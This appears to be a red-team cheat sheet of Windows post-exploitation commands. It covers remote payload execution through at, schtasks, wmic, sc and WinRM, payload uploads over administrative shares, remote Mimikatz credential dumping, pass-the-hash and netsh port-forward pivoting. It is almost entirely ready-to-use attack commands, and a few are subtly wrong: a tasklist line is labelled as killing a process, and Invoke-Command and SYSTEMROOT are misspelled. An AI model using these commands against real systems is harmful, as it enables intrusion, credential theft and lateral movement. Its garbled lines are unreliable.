infosecn1nja/Agentless-Post-Exploitation.md

## Agentless-Post-Exploitation.md

      
    Raw
  

              Agentless-Post-Exploitation.md
            
          
    Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrators Rights

dir \\host\C$
at \\host

Execute : at

net time \\host
at \\host HH:MM c:\windows\temp\foobar.exe

Execute : SCHTASKS

schtasks /create /tn foobar /tr c:\windows\temp\foobar.exe /sc once /st 00:00 /S host /RU System
schtasks /run /tn foobar /S host
schtasks /F /delete /tn foobar /S host

Execute : wmic

wmic /node:host process call create "c:\windows\temp\foobar.exe"

Execute : sc

sc \\host create foobar binpath= "c:\windows\temp\foobar.exe"
sc \\host start foobar

Execute : WinRM

InvokeCommand -ComputerName TARGET -ScriptBlock { dir c:\ }

Upload && Download

C$ : C:\
ADMIN$ : %SYTEMROOT% (C:\Windows\)

Upload:
copy payload.exe \\host\ADMIN$\temp\

Download:
copy \\host\ADMIN$\temp\payload.exe payload.exe

Process Manipulation

List Process:
tasklist /v /S TARGET

Kill Process:
tasklist /S TARGET /PID PID /f

Mimikatz

Invoke-Mimikatz -ComputerName TARGET
Invoke-Mimikatz -ComputerName TARGET -Command command

Pass-the-hash Mimikatz

mimikatz sekurlsa::pth /user:Administrator /ntlm:<ntlm> /run:"cmd.exe"

Pivoting

netsh interface portproxy add v4tov4 listenport=<LPORT> listenaddress=0.0.0.0 connectport=<RPORT> connectaddress=<RHOST>